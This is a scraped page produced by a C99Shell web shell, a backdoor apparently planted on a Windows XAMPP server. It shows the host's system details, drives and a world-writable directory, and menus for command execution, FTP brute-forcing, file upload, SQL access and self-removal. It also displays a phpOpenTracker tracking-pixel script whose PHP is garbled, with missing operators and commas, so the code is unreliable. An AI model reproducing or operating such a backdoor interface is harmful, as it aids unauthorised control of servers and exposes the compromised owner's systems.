!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\xampp\xampp\htdocs\jaime\Xcode\StatsAndTracking\   drwxrwxrwx
Free 7.27 GB of 239.26 GB (3.04%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     image.php (2.4 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
//
// +---------------------------------------------------------------------+
// | phpOpenTracker - The Website Traffic and Visitor Analysis Solution  |
// +---------------------------------------------------------------------+
// | Copyright (c) 2000-2003 Sebastian Bergmann. All rights reserved.    |
// +---------------------------------------------------------------------+
// | This source file is subject to the phpOpenTracker Software License, |
// | Version 1.0, that is bundled with this package in the file LICENSE. |
// | If you did not receive a copy of this file, you may either read the |
// | license online at http://phpOpenTracker.de/license/1_0.txt, or send |
// | a note to license@phpOpenTracker.de, so we can mail you a copy.     |
// +---------------------------------------------------------------------+
//
// $Id: image.php,v 1.1 2003/12/12 08:06:02 kevin Exp $
//

ignore_user_abort(true);

header('Content-type: image/gif');
header('Expires: Sat, 22 Apr 1978 02:19:00 GMT');
header('Last-Modified: ' gmdate('D, d M Y H:i:s') . ' GMT');
header('Cache-Control: no-store, no-cache, must-revalidate');
header('Cache-Control: post-check=0, pre-check=0'false);
header('Pragma: no-cache');

printf(
  
'%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%',
  
71,73,70,56,57,97,1,0,1,0,128,255,0,192,192,192,0,0,0,33,249,4,1,0,0,0,0,44,0,0,0,0,1,0,1,0,0,2,2,68,1,0,59
);

require 
'phpOpenTracker.php';

if ( isset(
$_GET['document_url']) &&
    !empty(
$_GET['document_url'])) {
  
$parameters['document_url'] = base64_decode($_GET['document_url']);
}

else if (isset(
$_SERVER['HTTP_REFERER'])) {
  
$parameters['document_url'] = $_SERVER['HTTP_REFERER'];
}

if (!isset(
$parameters['document_url'])) {
  exit;
}

if ( isset(
$_GET['document']) &&
    !empty(
$_GET['document'])) {
  
$parameters['document'] = $_GET['document'];
} else {
  
$parameters['document'] = $parameters['document_url'];
}

$parameters['client_id'] = isset($_GET['client_id']) ? $_GET['client_id']              : 1;
$parameters['referer']   = isset($_GET['referer'])   ? base64_decode($_GET['referer']) : '';

if (   isset(
$_GET['add_data']) &&
    
is_array($_GET['add_data'])) {
  foreach (
$_GET['add_data'] as $data) {
    list(
$field$value) = explode('::'$data);

    
$parameters['add_data'][$field] = $value;
  }
}

phpOpenTracker::log($parameters);
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--